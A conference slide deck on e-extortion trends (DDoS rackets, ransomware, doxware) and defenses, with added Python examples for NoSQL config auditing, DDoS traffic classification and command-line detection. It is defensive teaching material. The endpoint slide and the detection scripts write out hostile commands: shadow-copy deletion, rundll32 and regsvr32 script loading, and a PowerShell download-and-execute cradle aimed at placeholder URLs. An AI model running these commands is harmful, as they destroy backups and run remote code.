Erik Iker
Sr. Incident Response Analyst
B-Sides Tampa 2017
e-Extortion Trends & Defense
Cisco Confidential 2
Whoami
• Incident Response Analyst for Cisco Security Advisory Services. Working with customers performing strategic, proactive, and reactive response to information security issues
• 3 years – Insider threat analyst then Intrusion Forensics and Hunt Team manager at JPMorgan Chase
• 13 years law enforcement performing digital forensics and computer crime investigations
Agenda
Evolution of extortion and trends
Ransomware Defense
DDoS & Threat Intel
Extortion Defined
The practice of obtaining something, especially money, through force or threats
Attribution was simpler
First forays into e-extortion
• 2007 FBI release of warning about online extortion mirroring mafia tactics
DDoS “Protection” Racket
Armada Collective DHS Warning
Lizard Squad Gaming DDoS
Cats Catch Some Mice Again
• Early 2016 Interpol coordinated arrests of Armada Collective members in Australia, and DD4BC members in Bosnia and Herzegovina
Copy Cat Profiteering
Ransom Extends Extortion
• Ransom: Payment demanded for the release of a captured person or property
Data Breach Response Phishing
• Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
Data Breached for Ransom
Ransomware Scams That Can’t Decrypt
• http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/
• http://blog.talosintel.com/2016/07/ranscam.html
Ransom Hits Home
• Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being deleted with ransom note left.
• Completely unable to be recovered, EVEN IF YOU PAY
The Gift That Keeps Giving
• In January, Cisco Talos researchers found new variants of Locky also deliver Kovter click fraud Trojan
• http://blog.talosintel.com/2017/01/locky-struggles.html
E-Extortion Trifecta
• Doxware brings all the extortion tactics into one, and is becoming more mainstream:
  – Encryption
  – Exfiltration
  – Extortion demands
  – Public Data Leak
What We Know So Far
• History repeats itself with the cat-and-mouse game, and innovation of the mice
  – We have to be ready for the next evolution of threats
• Getting to know your enemy can keep you from paying out to imposters
  – We need to gain intelligence about our threats
• Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts?
  – Let’s be prepared to defend ourselves and maintain business continuity plans
Ransom?
• “Without a hostage, there is no ransom. That’s what a ransom is.”
- The rules according to Walter Sobchak
Backups – Offline if Possible
• CryptoFortress – encrypting unmapped shares
• SamSam – Criminal group obtaining foothold through LFI, conducting surveillance, then encrypting everything including backup servers
System Hardening
• Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PS, remove it
• If you can’t remove PS, disable ISE and REPL ability
• Application whitelisting
• Change default network options for NoSQL
  – bind 127.0.0.1 instead of 0.0.0.0
  – Change default ports to custom config to stifle script kiddies
  – https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for-ransom
• Restrict IP ranges that can access your NoSQL instance
• Implement security group for cloud instances
  – http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
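The bind-address and default-port points above are easy to check mechanically. The following is an added example, not code from the slides or from Cisco: a small Python audit that flattens a redis.conf, mongod.conf (YAML) or elasticsearch.yml into key/value pairs and flags the weak settings the slide calls out (listening on 0.0.0.0, no authentication, default port). The configuration keys (`bind`, `protected-mode`, `requirepass`, `net.bindIp`, `security.authorization`, `network.host`, `http.port`) are the real ones for those daemons; the sample configs and the "weak" versus "fixed" pairs are constructed for illustration.

```python
import re

# Default listener ports per service (real defaults for these daemons).
DEFAULT_PORTS = {"redis": "6379", "mongodb": "27017", "elasticsearch": "9200"}
# Bind values that expose the service on every interface (the weak default the slide warns about).
ALL_INTERFACES = {"0.0.0.0", "::", "*", "_global_", "_site_"}

# --- Constructed sample configs: the weak form beside the hardened form ---
REDIS_WEAK = """\
# redis.conf as found on an exposed host (constructed sample)
bind 0.0.0.0
port 6379
protected-mode no
"""
REDIS_FIXED = """\
bind 127.0.0.1
port 16379
protected-mode yes
requirepass REPLACE-WITH-A-STRONG-SECRET
"""
MONGO_WEAK = """\
net:
  port: 27017
  bindIp: 0.0.0.0
"""
MONGO_FIXED = """\
net:
  port: 37017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""
ES_WEAK = """\
cluster.name: docs
network.host: 0.0.0.0
http.port: 9200
"""
ES_FIXED = """\
cluster.name: docs
network.host: 127.0.0.1
http.port: 19200
"""

_KV = re.compile(r"^([A-Za-z0-9_.\-]+)\s*:?\s*(.*)$")


def parse_kv(text):
    """Flatten a redis.conf ('key value') or simple YAML ('key: value') file into a dict.
    Comments and blank lines are skipped. YAML nesting is ignored, which is enough for the
    handful of leaf keys audited here. A later key overrides an earlier one."""
    pairs = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = _KV.match(line)
        if m:
            pairs[m.group(1)] = m.group(2).strip()
    return pairs


def audit(kind, text):
    """Return a list of findings (empty means nothing flagged) for one service config."""
    kv = parse_kv(text)
    findings = []
    if kind == "redis":
        # Redis listens on every interface when no bind directive is present at all.
        if any(a in ALL_INTERFACES for a in kv.get("bind", "0.0.0.0").split()):
            findings.append("listens on all interfaces")
        if kv.get("protected-mode", "yes").lower() == "no":
            findings.append("protected-mode disabled")
        if "requirepass" not in kv:
            findings.append("no password (requirepass) set")
        port = kv.get("port", "6379")
    elif kind == "mongodb":
        addrs = [a.strip() for a in kv.get("bindIp", "127.0.0.1").split(",")]
        if kv.get("bindIpAll", "false").lower() == "true" or any(a in ALL_INTERFACES for a in addrs):
            findings.append("listens on all interfaces")
        if kv.get("authorization", "disabled").lower() != "enabled":
            findings.append("authorization not enabled")
        port = kv.get("port", "27017")
    elif kind == "elasticsearch":
        if kv.get("network.host", "127.0.0.1") in ALL_INTERFACES:
            findings.append("listens on all interfaces")
        port = kv.get("http.port", "9200")
    else:
        raise ValueError(f"unknown service: {kind}")
    # Non-default port is the "stifle script kiddies" point from the slide: low value, but cheap.
    if port == DEFAULT_PORTS[kind]:
        findings.append(f"default port {port} in use")
    return findings


if __name__ == "__main__":
    for kind, weak, fixed in (("redis", REDIS_WEAK, REDIS_FIXED),
                              ("mongodb", MONGO_WEAK, MONGO_FIXED),
                              ("elasticsearch", ES_WEAK, ES_FIXED)):
        print(kind, "weak:", audit(kind, weak))
        print(kind, "fixed:", audit(kind, fixed))
```

Loopback binding only helps hosts that should never be reached over the network at all; for a clustered deployment the matching control is the IP-range restriction or cloud security group from the next two bullets, which this script does not check.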
Endpoint Solutions
• Able to review for heuristic patterns of binaries being called, and review command line parameters such as:
  – “vssadmin.exe delete shadows /all /quiet del /f /q %0”
  – “rundll32.exe C:\Users\$username\AppData\Local\Temp”
  – “rundll32.exe javascript:"mshtml,RunHTMLApplication <script execution stuff>.RegRead("HKCU\<specific registry path>")"” will interpret in the command line as “rundll.exe mshtml.dll, $hexadecimal for entry point in memory”
  – “regsvr32.exe /s /u /i:<^((http[s]?|ftp):/)?/?([^:/\s]+)((/\w+)*/)([\w\-.]+[^#?\s]+)(.*)?(#[\w\-]+)?$> scrobj.dll”
  – “Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('^((http[s]?|ftp):/)?/?([^:/\s]+)((/\w+)*/)([\w\-.]+[^#?\s]+)(.*)?(#[\w\-]+)?$')"”
  – “Maliciousbinary.exe %windir%system32....%smstc.exe”
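The command-line patterns on this slide are what an endpoint tool or SIEM rule would key on. The following is an added example, not code from the slides or from Cisco: a Python rule set that encodes the slide's patterns (shadow-copy deletion, rundll32 loading from a user's Temp directory, rundll32 with a javascript: argument, regsvr32 fetching a remote scriptlet into scrobj.dll, and a PowerShell IEX/DownloadString cradle) and runs them over constructed process-creation events. Hostnames, the example.invalid URLs and the command lines in `EVENTS` are constructed for the test and are not indicators from the talk.

```python
import re

# Detection rules named after the slide's heuristics. Case-insensitive because Windows is.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("rundll32_from_temp",
     re.compile(r'\brundll32(\.exe)?\s+"?[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\b', re.I)),
    ("rundll32_javascript",
     re.compile(r"\brundll32(\.exe)?\s+javascript:", re.I)),
    ("regsvr32_remote_scriptlet",
     re.compile(r'\bregsvr32(\.exe)?\b.*?/i:\s*"?(https?|ftp)://.*?\bscrobj\.dll\b', re.I)),
    ("powershell_download_cradle",
     # Lookaheads so the order of iex and DownloadString on the line does not matter.
     re.compile(r"\bpowershell(\.exe)?\b(?=.*\biex\b)(?=.*\bdownloadstring\s*\()", re.I | re.S)),
]

# Constructed process-creation events: (host, command line). The first five mirror the
# slide's patterns with placeholder paths/URLs; the last three are benign look-alikes.
EVENTS = [
    ("ws-017", r"vssadmin.exe delete shadows /all /quiet"),
    ("ws-017", r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\abc.dll,Start"),
    ("ws-022", 'rundll32.exe javascript:"mshtml,RunHTMLApplication "'),
    ("ws-022", r"regsvr32.exe /s /u /i:http://example.invalid/file.sct scrobj.dll"),
    ("ws-031", 'powershell -nop -c "iex(New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"'),
    ("ws-040", r"vssadmin.exe list shadows"),
    ("ws-040", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    ("ws-041", 'powershell -c "Get-Process"'),
]


def match_rules(cmdline):
    """Names of every rule whose pattern appears in one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Run all rules over (host, cmdline) events; return (host, rule, cmdline) hits in event order."""
    hits = []
    for host, cmdline in events:
        for rule in match_rules(cmdline):
            hits.append((host, rule, cmdline))
    return hits


if __name__ == "__main__":
    for host, rule, cmdline in scan(EVENTS):
        print(f"{host:8} {rule:28} {cmdline}")
```

Each hit should be tied back to the parent process and user before anyone acts on it: `vssadmin list shadows` from a backup agent and `rundll32 ... shell32.dll` from Explorer are everyday noise, which is why the benign events in the sample produce no hits.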
Ransomware Decryptors
• https://www.nomoreransom.org/
• http://www.talosintelligence.com/teslacrypt_tool/
What About Things That Aren’t Ransomware?
One DDoS Does Not Fit All
• Volume Based Attacks – goal is to overload bandwidth – UDP flood, ICMP floods (bits per second)
• Protocol Attacks – goal is to overload router, firewall, and GLB – fragmented packets, Smurf Attack (spoof victim IP for requests reflected at victim) (packets per second)
• Application Attacks – goal is to overload the resources of the web server – flood of GET or POST requests – Slowloris – creating connections with only partial requests to leave connection open (requests per second)
Mirai
• Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS
• Mirai takes over device and shuts off Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation
• Baby Monitors and CCTV cameras responsible for high profile attacks
• Using dictionary of ~60 weak passwords (less than the Morris
DDoSaaS
DDoS Game Plan
• Be able to detect DDoS before network is inaccessible, or systems are crashing using NetFlow, system resource, and Firewall traffic monitoring dashboards
• Have a plan for blocking, dropping, scrubbing, rate limiting traffic using local appliances or a vendor relationship
• Do not rely solely on an agreement with ISP as your plan for DDoS mitigation
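The three DDoS classes from the "One DDoS Does Not Fit All" slide are each measured in a different unit (bits, packets, requests per second), and the game plan above says to see them in NetFlow before the network falls over. The following is an added example, not code from the slides or from Cisco: a Python classifier that aggregates constructed NetFlow-style records per destination over a ten-second export window, derives bps, pps, the share of ICMP/fragmented packets, HTTP connection rate and the count of tiny long-lived HTTP connections (the Slowloris signature), and labels each destination with the class whose threshold it crosses. The `Flow` record layout, the four synthetic traffic sets (addresses from the RFC 5737 documentation ranges) and the thresholds in `THRESHOLDS` are all constructed; in production the thresholds come from a baseline of your own normal traffic.

```python
from collections import namedtuple, defaultdict

# Minimal NetFlow-like record (constructed layout; a real v5/v9 export carries more fields).
Flow = namedtuple("Flow", "src dst proto dport packets bytes duration fragmented")

WINDOW_S = 10  # width of the export window the sample flows fall into (constructed)

# Constructed thresholds: derive these from a baseline of your own traffic in practice.
THRESHOLDS = {
    "volumetric_bps": 1e9,     # bits per second into one destination
    "protocol_pps": 1e5,       # packets per second into one destination ...
    "protocol_share": 0.5,     # ... with more than half of them ICMP or fragments
    "app_req_per_s": 200,      # new HTTP(S) connections per second
    "app_partial_conns": 1000, # tiny, long-lived HTTP(S) connections (Slowloris style)
}


def summarize(flows, window_s=WINDOW_S):
    """Per-destination rates for the slide's three units: bits/s, packets/s, requests/s."""
    acc = defaultdict(lambda: {"packets": 0, "bytes": 0, "proto_pkts": 0, "http_conns": 0, "http_partial": 0})
    for f in flows:
        s = acc[f.dst]
        s["packets"] += f.packets
        s["bytes"] += f.bytes
        if f.proto == "icmp" or f.fragmented:   # protocol-attack traffic per the slide
            s["proto_pkts"] += f.packets
        if f.proto == "tcp" and f.dport in (80, 443):
            s["http_conns"] += 1
            if f.bytes < 500 and f.duration > 5:  # partial request held open
                s["http_partial"] += 1
    stats = {}
    for dst, s in acc.items():
        stats[dst] = {
            "bps": s["bytes"] * 8 / window_s,
            "pps": s["packets"] / window_s,
            "proto_share": s["proto_pkts"] / s["packets"] if s["packets"] else 0.0,
            "req_per_s": s["http_conns"] / window_s,
            "http_partial": s["http_partial"],
        }
    return stats


def classify(st, t=THRESHOLDS):
    """Labels for one destination's stats; a target can be under more than one class at once."""
    labels = []
    if st["bps"] > t["volumetric_bps"]:
        labels.append("volumetric")
    if st["pps"] > t["protocol_pps"] and st["proto_share"] > t["protocol_share"]:
        labels.append("protocol")
    if st["req_per_s"] > t["app_req_per_s"] or st["http_partial"] > t["app_partial_conns"]:
        labels.append("application")
    return labels


def make_flows(n, dst, proto, dport, packets, nbytes, duration, fragmented=False):
    """Constructed sample: n identical flows from rotating sources in 198.51.100.0/24."""
    return [Flow(f"198.51.100.{i % 254 + 1}", dst, proto, dport, packets, nbytes, duration, fragmented)
            for i in range(n)]


SAMPLE = (
    make_flows(1000, "203.0.113.10", "udp", 80, 1000, 1_400_000, 10.0)   # UDP flood, full-size packets
    + make_flows(1000, "203.0.113.20", "icmp", 0, 2000, 128_000, 10.0)   # ICMP flood, 64-byte packets
    + make_flows(3000, "203.0.113.30", "tcp", 80, 5, 300, 9.5)           # partial HTTP requests held open
    + make_flows(50, "203.0.113.40", "tcp", 443, 40, 30_000, 1.0)        # ordinary HTTPS traffic
)


def detect(flows=SAMPLE):
    """Map each destination in the window to its DDoS class labels."""
    return {dst: classify(st) for dst, st in summarize(flows).items()}


if __name__ == "__main__":
    for dst, st in summarize(SAMPLE).items():
        print(f"{dst:14} {st['bps']/1e6:9.1f} Mb/s {st['pps']:9.0f} pps {st['req_per_s']:6.0f} req/s -> {classify(st)}")
```

The point of separating the three rates is that mitigation differs: bandwidth-scale floods need upstream scrubbing or a vendor relationship, packet-rate attacks stress the firewall and load balancer, and application-layer attacks are invisible in bps and pps and only show up in connection counts, which is why the plan above asks for dashboards on all three.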
Start with Google
Follow the Money
Intel Feeds and Community Membership
• ISACs
o msisac.cisecurity.org
o fsisac.com
o r-cisc.org
• Malware sharing - www.misp-project.org
• MITRE Threat Intel Project - https://crits.github.io/
• Tons of paid vendor feeds
Use Your Phishing Quarantine Data
Thanks
• Twitter - @ErikIkerFW
• LinkedIn - www.linkedin.com/in/erikiker

costume and set research powerpoint presentation
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 

E-Extortion Trends & Defense Strategies

  • 1. Erik Iker, Sr. Incident Response Analyst, B-Sides Tampa 2017: e-Extortion Trends & Defense
  • 2. Whoami
    • Incident Response Analyst for Cisco Security Advisory Services, working with customers performing strategic, proactive, and reactive response to information security issues
    • 3 years: insider threat analyst, then Intrusion Forensics and Hunt Team manager at JPMorgan Chase
    • 13 years law enforcement performing digital forensics and computer crime investigations
  • 3. Agenda: evolution of extortion and trends; ransomware defense; DDoS & threat intel
  • 4. Extortion Defined: the practice of obtaining something, especially money, through force or threats
  • 6. First forays into e-extortion
    • 2007 FBI release of a warning about online extortion mirroring mafia tactics
  • 7. DDoS “Protection” Racket
  • 8. Armada Collective DHS Warning
  • 9. Lizard Squad Gaming DDoS
  • 10. Cats Catch Some Mice Again
    • Early 2016 Interpol coordinated arrests of Armada Collective members in Australia, and DD4BC members in Bosnia and Herzegovina
  • 11. Copy Cat Profiteering
  • 12. Ransom Extends Extortion
    • Ransom: payment demanded for the release of a captured person or property
  • 13. Data Breach Response Phishing
    • Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
  • 14. Data Breached for Ransom
  • 15. Ransomware Scams That Can’t Decrypt
    • http://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/
    • http://blog.talosintel.com/2016/07/ranscam.html
  • 16. Ransom Hits Home
    • Publicly accessible NoSQL, Elasticsearch, Hadoop, and Redis instances being deleted with a ransom note left behind
    • Completely unable to be recovered, EVEN IF YOU PAY
  • 17. The Gift That Keeps Giving
    • In January, Cisco Talos researchers found that new variants of Locky also deliver the Kovter click fraud Trojan
    • http://blog.talosintel.com/2017/01/locky-struggles.html
  • 18. E-Extortion Trifecta
    • Doxware brings all the extortion tactics into one, and is becoming more mainstream:
    • Encryption
    • Exfiltration
    • Extortion demands
    • Public data leak
  • 19. What We Know So Far
    • History repeats itself with the cat-and-mouse game and the innovation of the mice: we have to be ready for the next evolution of threats
    • Getting to know your enemy can keep you from paying out to imposters: we need to gain intelligence about our threats
    • Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts? Let’s be prepared to defend ourselves and maintain business continuity plans
  • 20. Ransom?
    • “Without a hostage, there is no ransom. That’s what a ransom is.” The rules according to Walter Sobchak
  • 21. Backups: Offline if Possible
    • CryptoFortress: encrypting unmapped shares
    • SamSam: criminal group obtaining a foothold through LFI, conducting surveillance, then encrypting everything including backup servers
  • 22. System Hardening
    • Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PowerShell, remove it
    • If you can’t remove PowerShell, disable the ISE and REPL ability
    • Application whitelisting
    • Change the default network options for NoSQL: bind 127.0.0.1 instead of 0.0.0.0, and change default ports to a custom config to stifle script kiddies
    • https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for-ransom
    • Restrict the IP ranges that can access your NoSQL instance; implement security groups for cloud instances
    • http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
  • 23. Endpoint Solutions
    • Able to review for heuristic patterns of binaries being called, and to review command line parameters such as:
    • `vssadmin.exe delete shadows /all /quiet del /f /q %0`
    • `rundll32.exe C:\Users\$username\AppData\Local\Temp`
    • `rundll32.exe javascript:"mshtml,RunHTMLApplication <script execution stuff>.RegRead("HKCU\<specific registry path>")"`, which the command line will interpret as `rundll.exe mshtml.dll, $hexadecimal for entry point in memory`
    • `regsvr32.exe /s /u /i:<URL matching ^((http[s]?|ftp):\/)?\/?([^:\/\s]+)((\/\w+)*\/)([\w\-\.]+[^#?\s]+)(.*)?(#[\w\-]+)?$> scrobj.dll`
    • `powershell -nop -c "iex (New-Object Net.WebClient).DownloadString('<URL matching the same regex>')"`
    • `Maliciousbinary.exe %windir%system32....%smstc.exe`
  • 24. Ransomware Decryptors
    • https://www.nomoreransom.org/
    • http://www.talosintelligence.com/teslacrypt_tool/
  • 25. What About Things That Aren’t Ransomware? (video clip: neeson_speech1)
  • 26. One DDoS Does Not Fit All
    • Volume based attacks: the goal is to overload bandwidth; UDP floods, ICMP floods (measured in bits per second)
    • Protocol attacks: the goal is to overload the router, firewall, and GLB; fragmented packets, Smurf attack (spoof the victim IP for requests reflected at the victim) (measured in packets per second)
    • Application attacks: the goal is to overload the resources of the web server; a flood of GET or POST requests; Slowloris, creating connections with only partial requests to leave the connection open (measured in requests per second)
  • 27. Mirai
    • The Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS
    • Mirai takes over the device and shuts off the Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation
    • Baby monitors and CCTV cameras responsible for high profile attacks
    • Using a dictionary of ~60 weak passwords (less than the Morris
  • 29. DDoS Game Plan
    • Be able to detect DDoS before the network is inaccessible or systems are crashing, using NetFlow, system resource, and firewall traffic monitoring dashboards
    • Have a plan for blocking, dropping, scrubbing, and rate limiting traffic using local appliances or a vendor relationship
    • Do not rely solely on an agreement with your ISP as your plan for DDoS mitigation
  • 32. Intel Feeds and Community Membership
    • ISACs: msisac.cisecurity.org, fsisac.com, r-cisc.org
    • Malware sharing: www.misp-project.org
    • MITRE threat intel project: https://crits.github.io/
    • Tons of paid vendor feeds
  • 33. Use Your Phishing Quarantine Data
  • 34. Thanks
    • Twitter: @ErikIkerFW
    • LinkedIn: www.linkedin.com/in/erikiker
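The command-line review described on the "Endpoint Solutions" slide, as an added example that is not part of the deck: one regex rule per slide bullet, run over constructed process-creation events (the log format, host, user and example.invalid URLs are assumptions of this example).

```python
"""Heuristic review of process command lines for the patterns on the
"Endpoint Solutions" slide. Rule names, regexes and sample events are this
example's own constructions, not part of the original deck."""
from __future__ import annotations

import re
from dataclasses import dataclass

# One compiled pattern per slide bullet; all matching is case-insensitive.
RULES = {
    # vssadmin.exe delete shadows /all /quiet ...
    "shadow_copy_deletion": re.compile(
        r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    # rundll32.exe loading a DLL from C:\Users\<user>\AppData\Local\Temp
    "rundll32_from_user_temp": re.compile(
        r"\brundll32(\.exe)?\s+\S*\\users\\[^\\]+\\appdata\\local\\temp\\", re.I),
    # rundll32.exe javascript:"mshtml,RunHTMLApplication ..."
    "rundll32_javascript": re.compile(
        r"\brundll32(\.exe)?\s+javascript:", re.I),
    # regsvr32.exe /s /u /i:<url> scrobj.dll
    "regsvr32_remote_scriptlet": re.compile(
        r"\bregsvr32(\.exe)?\b.*\s/i:\S+.*\bscrobj\.dll\b", re.I),
    # powershell -nop -c "iex (New-Object Net.WebClient).DownloadString(...)"
    "powershell_download_cradle": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-no(p|profile)\b.*(downloadstring|iex|invoke-expression)",
        re.I),
}


@dataclass
class Alert:
    rule: str
    command_line: str


def scan_command_line(cmd: str) -> list[str]:
    """Names of every rule that fires on a single process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan_log(lines: list[str]) -> list[Alert]:
    """Run every rule over process-creation events of the assumed form
    '<timestamp> <host> <user> CMD=<command line>'."""
    alerts: list[Alert] = []
    for line in lines:
        _, sep, cmd = line.partition("CMD=")
        if not sep:
            continue  # not a process-creation event
        for rule in scan_command_line(cmd):
            alerts.append(Alert(rule, cmd))
    return alerts


# Constructed sample events; host, user and example.invalid URLs are placeholders.
SAMPLE_LOG = [
    "2017-02-10T14:02:11Z WS-0142 jdoe CMD=vssadmin.exe delete shadows /all /quiet",
    r"2017-02-10T14:02:13Z WS-0142 jdoe CMD=rundll32.exe C:\Users\jdoe\AppData\Local\Temp\a1.dll,Start",
    '2017-02-10T14:02:15Z WS-0142 jdoe CMD=rundll32.exe javascript:"mshtml,RunHTMLApplication <script>"',
    "2017-02-10T14:02:17Z WS-0142 jdoe CMD=regsvr32.exe /s /u /i:http://example.invalid/p.sct scrobj.dll",
    "2017-02-10T14:02:19Z WS-0142 jdoe CMD=powershell -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    "2017-02-10T14:05:00Z WS-0142 jdoe CMD=vssadmin.exe list shadows",  # benign admin use
    r'2017-02-10T14:05:02Z WS-0142 jdoe CMD=regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"',  # benign
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"[{a.rule}] {a.command_line}")
```

The two benign lines at the end of the sample are there to show that ordinary `vssadmin list` and local `regsvr32` use do not trip the rules.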

Editor's Notes

  1. Extortion threats and vulnerabilities were easier to gauge prior to the beginnings of e-extortion.
  2. Mafia-style extortion had some drawbacks, mainly easier attrition and law enforcement action. Through the entire life of extortion, though, the cat-and-mouse evolution stays the same.
  3. As with all things, everything old is new again. This threat resurfaced in 2013 without much change in the wording, but was at least leveraging new technology and asking for bitcoin payment with a link to a BTC address.
  4. History repeats itself in 2015 when the real Armada Collective causes harm to many email and financial institutions. The warning by DHS shows that there was a small DDoS attack, a show of power, followed by an email demand for payment.
  5. Lizard Squad received much media attention for its DDoS attacks on gaming networks despite giving warning of the attacks ahead of time on Twitter. They also chose to stop their Christmas 2014 DDoS of the Xbox network after Kim Dotcom agreed to pay them in Megaupload vouchers so he could play Destiny.
  6. After Armada Collective was arrested, this group sent phishing emails to companies and cashed in without ever launching an attack. The MO of email before DDoS didn’t match what the real Armada Collective did, and it didn’t take a costly threat intel feed to google the DHS alert and see how the real group’s operation differed. All it takes is an email address to collect money if you can capitalize on a famous name. In 2015 multiple companies paid up in response to phishing emails after seeing what the mighty Sony and Microsoft networks couldn’t stop from Lizard Squad.
  7. Adult Friend Finder, Brazzers, Ashley Madison, Penthouse, YouPorn, Fur Affinity
  8. We are now seeing the combination of ransomware with other types of malware to keep attacks active after the payment of a ransom. With high profile ransoms for breached data by certain actors, and the profitability of ransomware, why have these forces not combined ransomware with information stealing malware, to exfiltrate the encrypted files and then sell the data online if the ransom is not paid, or even if it is?
  9. Ranscam differs from other ransomware families like Locky, CryptoLocker, Cerber, etc., because even if you pay, they do not release your files. Definitely good to know if you would be paying for nothing. It will be interesting to see how this changes the underground economy of ransomware. A newer variant is Linux KillDisk, demanding $250k.
  10. Security researcher Victor Gevers started noting MongoDB instances being deleted on Dec 26, 2016; this expanded to other databases. Scriptable actions, no recovery possible. Sigaint email addresses appear in multiple campaigns.
  11. Even after files are released on Locky payment, the infection can remain.
  12. Combining Pony credential stealing with ransomware, becoming more prevalent since Oct 2016, reported on by https://www.scmagazine.com/researchers-spot-ransomware-with-abilities-to-leak-data-for-non-compliance/article/567622/
  13. The Big Lebowski: Bunny Lebowski was found to have gone home, and the Germans kept trying to get the ransom money. “WTF,” Walter said, those are the rules; is he the only one who cares about the rules? If we can keep ransomware from having any effect, then there is no ransom at all. The next slides discuss how.
  14. Offline backups need to be emphasized with the new ransomware variant CryptoFortress, discovered in March 2016, seeking SMB paths that are not even mapped. Samas targeting backup servers. Have you tried to recover from those backups and seen whether your process and backup style/age is conducive to it? Changes to the PsExec key, terminal server key, PuTTY key.
